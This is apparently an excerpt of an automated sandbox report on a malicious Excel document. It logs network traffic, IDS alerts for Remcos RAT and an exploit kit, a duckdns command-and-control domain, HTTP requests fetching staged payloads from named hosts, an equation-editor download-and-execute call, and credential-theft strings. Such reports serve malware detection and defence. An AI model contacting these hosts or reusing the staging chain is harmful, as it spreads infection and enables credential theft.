                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 192.210.214.9:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 192.210.214.9:14645
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 107.172.31.21:80 -> 192.168.2.22:49172
                Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 107.172.31.21:80 -> 192.168.2.22:49172
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 2024remcmon.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: 2024remcmon.duckdns.org
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/EVRR.txt HTTP/1.1Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
                Source: Joe Sandbox ViewIP Address: 192.210.214.9 192.210.214.9
                Source: Joe Sandbox ViewIP Address: 88.99.66.38 88.99.66.38
                Source: Joe Sandbox ViewIP Address: 107.172.31.21 107.172.31.21
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /FoNVg0 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/sweetbuttersmoothbananahereforyou.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 192.168.2.22:49165 -> 88.99.66.38:443 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C525119.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /FoNVg0 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/sweetbuttersmoothbananahereforyou.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/nbc/EVRR.txt HTTP/1.1Host: 107.172.31.21Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: bhv2AF7.tmp.15.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: bhv2AF7.tmp.15.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: zhort.de
                Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: 2024remcmon.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
